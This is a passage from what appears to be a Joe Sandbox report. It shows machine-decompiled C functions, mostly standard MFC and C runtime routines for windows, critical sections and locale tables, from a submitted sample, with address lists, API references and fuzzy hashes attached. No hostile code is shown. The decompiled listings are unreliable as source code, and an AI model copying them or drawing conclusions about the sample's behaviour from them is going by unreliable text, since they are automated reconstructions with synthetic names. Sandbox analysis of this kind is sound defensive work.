				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 = lstrcmpA( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}

0x0041a856
0x0041a85f
0x0041a88a
0x00000000
0x0041a890
0x0041a880
0x0041a888
0x00000000
0x00000000
0x0041a898

APIs

lstrlenA.KERNEL32(?,00000800), ref: 0041A850
GetWindowTextA.USER32 ref: 0041A86C
lstrcmpA.KERNEL32(?,?), ref: 0041A880
SetWindowTextA.USER32(00000104,?), ref: 0041A890

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420031, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420031(void* __ecx, void* __eflags) {
				signed int _t9;
				int _t10;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t13 = __ecx;
				E0042007A(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E00413740(_t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t9 =  *(_t13 + 0x84);
				_t14 = _t13 + 0x84;
				if(_t9 != 0) {
					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t10;
				}
				return _t9;
			}

0x00420033
0x00420037
0x0042003c
0x00420050
0x00420052
0x00420058
0x0042005e
0x00420066
0x0042006e
0x00420074
0x00000000
0x00420074
0x00420079

APIs

Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

ReleaseCapture.USER32(00000001,745EA0A0,?,00420430,00000000), ref: 0042003C
GetDesktopWindow.USER32 ref: 00420042
LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
ReleaseDC.USER32 ref: 0042006E

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406D64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406D64(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x43b660) = _t77;
								goto L16;
							}
							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
						} else {
							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x43b660) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00406d81
0x00406d87
0x00406d8e
0x00406d8e
0x00406d95
0x00406d96
0x00406d9a
0x00406d9d
0x00406da6
0x00406ddf
0x00406dfe
0x00406e22
0x00406e4a
0x00406e52
0x00406e54
0x00406e5a
0x00406e5a
0x00406e60
0x00406e7b
0x00406e8d
0x00000000
0x00406e8d
0x00406e7d
0x00406e84
0x00406e70
0x00406e70
0x00000000
0x00406e70
0x00406e62
0x00406e69
0x00000000
0x00406e94
0x00406e94
0x00406e96
0x00406e97
0x00000000
0x00406e5a
0x00406daa
0x00406dad
0x00406dad
0x00406db0
0x00406db5
0x00406db9
0x00406dc0
0x00406dc8
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd5
0x00406dd6
0x00406dd9
0x00000000
0x00406dde
0x00406e9d
0x00406ea4
0x00406ea7
0x00406ec5
0x00406eda
0x00406ecc
0x00406ecc
0x00406ed5
0x00000000
0x00406ed5
0x00406eae
0x00406eae
0x00406eb7
0x00406eba
0x00406eba
0x00406eba
0x00406ee1
0x00406ee2
0x00406ee8

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00406D78

Strings

, xrefs: 00406DC1
, xrefs: 00406D9D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00414354, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				void* _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E00425FC6(1);
				E004067EC(0, 0);
				_push(0);
				_t50 = E004249C4() + 0x58;
				_t27 = E00424BFB();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					_t36 = E004142C3();
					_t65 = _t36;
					if(_t36 == 0) {
						E0041A6C8(_t65);
					}
				}
				return _t50;
			}

0x00414356
0x0041435f
0x0041436a
0x00414374
0x00414377
0x0041437c
0x0041437f
0x00414384
0x004143b6
0x00414390
0x0041439a
0x004143a0
0x004143cd
0x004143d5
0x004143dd
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f4
0x004143f5
0x004143f8
0x004143fb
0x004143fe
0x00414401
0x00414406
0x00414408
0x0041440a
0x0041440a
0x00414408
0x00414415

APIs

Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0CD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E0040E0CD(intOrPtr __ecx) {
				void* _t30;
				void* _t33;

				E00406520(E0042AD9C, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, _t33, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E0D2

Strings

(B, xrefs: 0040E0E5
string too long, xrefs: 0040E0DA

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog
String ID: (B$string too long
API String ID: 3519838083-213930478
Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E516, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E516(intOrPtr __ecx, void* __eflags) {
				void* _t30;

				E00406520(E0042AE28, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, __eflags, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f908;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e51b
0x0040e520
0x0040e521
0x0040e52b
0x0040e52e
0x0040e535
0x0040e53d
0x0040e54a
0x0040e54c
0x0040e55c
0x0040e564
0x0040e56f
0x0040e577

APIs

__EH_prolog.LIBCMT ref: 0040E51B

Strings

(B, xrefs: 0040E52E
ios::failbit set, xrefs: 0040E523

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog
String ID: (B$ios::failbit set
API String ID: 3519838083-3284000329
Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404EAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404EAA(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) != 0) {
						L8:
						return 0x12340042;
					}
					_t6 =  &_a4; // 0x404f63
					_t18 =  *_t6;
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
						return 0;
					} else {
						goto L8;
					}
				}
				return  *0x439610(_a4, _a8);
			}

0x00404eb3
0x00404eca
0x00404ef6
0x00000000
0x00404ef6
0x00404ecc
0x00404ecc
0x00404ed5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ed5
0x00000000

APIs

GetSystemMetrics.USER32 ref: 00404EE3
GetSystemMetrics.USER32 ref: 00404EEB

Strings

cO@, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem
String ID: cO@
API String ID: 4116985748-3035479601
Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E073, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0040E073(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00406520(E0042AD88, _t54);
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
				E00401AE0(_t54 - 0x20, 0);
				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
				_t5 = _t54 - 4;
				 *_t5 =  *(_t54 - 4) & 0x00000000;
				_t60 =  *_t5;
				_push(_t54 - 0x20);
				_t42 = _t54 - 0x3c;
				L1();
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
				E004067EC(_t54 - 0x3c, 0x4336b8);
				_pop(_t51);
				E00406520(E0042AD9C, _t54);
				_push(_t42);
				_push(_t42);
				_t52 = _t42;
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
				E0040F44C(_t42, _t60, _t54 - 0x10);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
				E00401AE0(_t52 + 0xc, 0);
				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
				 *_t52 = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}

0x0040e078
0x0040e089
0x0040e08c
0x0040e0a2
0x0040e0a7
0x0040e0a7
0x0040e0a7
0x0040e0ae
0x0040e0af
0x0040e0b2
0x0040e0c0
0x0040e0c7
0x0040e0cc
0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0df
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E078

Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

string too long, xrefs: 0040E091, 0040E096, 0040E09E
ios::failbit set, xrefs: 0040E083

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: ios::failbit set$string too long
API String ID: 2062786585-1331328489
Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425BA0, Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E0042581A( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

0x00425ba3
0x00425ba6
0x00425bac
0x00425bae
0x00425bb2
0x00425bb5
0x00425bf9
0x00425bf9
0x00425bfd
0x00425c07
0x00425c0d
0x00425c16
0x00425c1e
0x00425c26
0x00425c26
0x00425c2c
0x00425c32
0x00425c36
0x00000000
0x00000000
0x00000000
0x00425bb7
0x00425bb7
0x00425bb7
0x00425bbc
0x00425bd9
0x00425bde
0x00425be4
0x00425be4
0x00425be6
0x00425be9
0x00425bc7
0x00425bc7
0x00425bce
0x00425bd0
0x00425bd0
0x00425bce
0x00425bed
0x00425bee
0x00425bf7
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 00425BFD
LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
LocalFree.KERNEL32(?), ref: 00425C16
TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00425F56, Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425F56(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x439bdc; // 0x1
				if(_t30 == 0) {
					_t14 = E00425EC3();
				}
				_t31 =  *0x439bd8; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x4399e0 + _t22 * 4;
					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
						EnterCriticalSection(0x439a28);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x439a28);
					}
					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

0x00425f59
0x00425f5f
0x00425f61
0x00425f61
0x00425f66
0x00425f6c
0x00425f70
0x00425f81
0x00425f88
0x00425f91
0x00425f96
0x00425fa3
0x00425fa9
0x00425fa9
0x00425fac
0x00425fb2
0x00425fb6
0x00425fbe
0x00000000
0x00425fc1
0x00425fc3

APIs

EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

